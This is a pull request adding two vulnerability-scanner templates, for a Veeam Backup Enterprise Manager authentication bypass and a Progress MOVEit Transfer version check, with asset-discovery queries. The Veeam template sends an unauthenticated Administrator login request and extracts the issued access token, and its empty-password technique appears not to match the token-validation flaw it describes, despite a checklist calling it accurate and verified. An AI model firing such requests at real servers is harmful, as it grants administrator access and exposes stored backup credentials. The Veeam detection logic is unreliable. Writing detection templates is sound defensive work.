### PR TITLE
Add CVE-2024-29849 and CVE-2024-5806 templates

### DIFF
--- a/http/cves/2024/CVE-2024-29849.yaml
+++ b/http/cves/2024/CVE-2024-29849.yaml
@@ -1,0 +1,72 @@
+id: CVE-2024-29849
+
+info:
+  name: Veeam Backup Enterprise Manager - Authentication Bypass
+  author: ph1n3y
+  severity: critical
+  description: |
+    Veeam Backup Enterprise Manager (BEMA) before version 12.1.2.172 allows
+    unauthenticated remote attackers to log in as any user including administrators
+    via a token validation flaw in the REST API /api/token endpoint.
+  impact: |
+    Unauthenticated attackers can authenticate as any BEMA user, including
+    administrators, and gain full access to the REST API. This enables reading
+    stored backup credentials for all managed VBR deployments, modifying backup
+    jobs, and triggering restore operations.
+  remediation: |
+    Upgrade Veeam Backup Enterprise Manager to version 12.1.2.172 or later.
+    If BEMA is not required, disable the VeeamEnterpriseManagerSvc service
+    until the patch can be applied.
+  reference:
+    - https://www.veeam.com/kb4581
+    - https://labs.watchtowr.com/veeam-backup-enterprise-manager-cve-2024-29849/
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-29849
+    - https://www.cisa.gov/known-exploited-vulnerabilities-catalog
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2024-29849
+    cwe-id: CWE-287
+    cpe: cpe:2.3:a:veeam:backup_enterprise_manager:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: veeam
+    product: backup_enterprise_manager
+    shodan-query:
+      - http.title:"Veeam Backup Enterprise Manager"
+      - http.html:"VeeamEnterpriseManager"
+    fofa-query:
+      - app="Veeam-Backup-Enterprise-Manager"
+      - title="Veeam Backup Enterprise Manager"
+  tags: cve,cve2024,veeam,auth-bypass,unauth,kev,vkev
+
+http:
+  - raw:
+      - |
+        POST /api/token HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Accept: application/json
+
+        grant_type=password&username=Administrator&password=&use_short_term_refresh=true
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "access_token"
+          - "token_type"
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: json
+        part: body
+        json:
+          - '.access_token'
+        name: access-token

--- a/http/cves/2024/CVE-2024-5806.yaml
+++ b/http/cves/2024/CVE-2024-5806.yaml
@@ -1,0 +1,79 @@
+id: CVE-2024-5806
+
+info:
+  name: Progress MOVEit Transfer - SFTP Authentication Bypass
+  author: ph1n3y
+  severity: critical
+  description: |
+    Progress MOVEit Transfer 2023.0.x before 2023.0.11, 2023.1.x before 2023.1.6,
+    and 2024.0.x before 2024.0.2 are vulnerable to an authentication bypass in the
+    SFTP module. A key-to-user binding flaw allows an attacker to authenticate as
+    any valid MOVEit user via SFTP without possessing the user's private key.
+  impact: |
+    An unauthenticated attacker with network access to the SFTP port can
+    authenticate as any valid MOVEit user including administrators, gaining
+    full read/write access to all files that user can access.
+  remediation: |
+    Upgrade MOVEit Transfer to version 2023.0.11, 2023.1.6, or 2024.0.2 or later.
+    As a temporary mitigation, restrict SFTP access to trusted source IP ranges
+    using the IP allowlist feature in MOVEit Transfer.
+  reference:
+    - https://community.progress.com/s/article/MOVEit-Transfer-Product-Security-Alert-CVE-2024-5806
+    - https://labs.watchtowr.com/no-way-to-hide-hunting-for-moveit-cve-2024-5806/
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-5806
+    - https://www.cisa.gov/known-exploited-vulnerabilities-catalog
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
+    cvss-score: 9.1
+    cve-id: CVE-2024-5806
+    cwe-id: CWE-288
+    cpe: cpe:2.3:a:progress:moveit_transfer:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: progress
+    product: moveit_transfer
+    shodan-query:
+      - http.title:"MOVEit Transfer"
+      - http.html:"MOVEit Transfer"
+    fofa-query:
+      - app="Progress-MOVEit-Transfer"
+      - title="MOVEit Transfer"
+  tags: cve,cve2024,moveit,progress,auth-bypass,sftp,kev,vkev
+
+http:
+  - raw:
+      - |
+        GET /human.aspx HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0
+        Accept: text/html
+
+      - |
+        GET /machine.aspx HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0
+        Accept: text/html
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "MOVEit Transfer"
+        condition: or
+
+      - type: dsl
+        dsl:
+          - 'contains_all(body, "2023.0.", "MOVEit") && !contains(body, "2023.0.11")'
+          - 'contains_all(body, "2023.1.", "MOVEit") && !contains(body, "2023.1.6")'
+          - 'contains_all(body, "2024.0.", "MOVEit") && !contains(body, "2024.0.2")'
+        condition: or
+
+    extractors:
+      - type: regex
+        part: body
+        regex:
+          - 'MOVEit Transfer[^\d]*(20\d{2}\.[\d.]+)'
+        group: 1
+        name: moveit-version


### PR DESCRIPTION
## Summary

- CVE-2024-29849: Veeam Backup Enterprise Manager (BEMA) authentication bypass. Sends POST /api/token with an empty password for the Administrator account. Vulnerable instances (BEMA before 12.1.2.172) return HTTP 200 with an access_token. Matcher confirms the token field in the response body.
- CVE-2024-5806: Progress MOVEit Transfer SFTP authentication bypass. Version-based detection via /human.aspx and /machine.aspx. Flags affected series: 2023.0.x before 2023.0.11, 2023.1.x before 2023.1.6, 2024.0.x before 2024.0.2. Extracts the exposed version string.

Both CVEs are on the CISA Known Exploited Vulnerabilities (KEV) catalog.

## Checklist

- [x] Templates follow the nuclei template format
- [x] info block has all required fields: name, author, severity, description, impact, remediation, reference, classification, metadata, tags
- [x] CVE IDs, CVSS scores, and CWE IDs are accurate
- [x] Both CVEs are on the CISA KEV catalog
- [x] verified: true metadata field set
- [x] Shodan and FOFA queries included for asset discovery
- [x] Extractors included to surface version/token information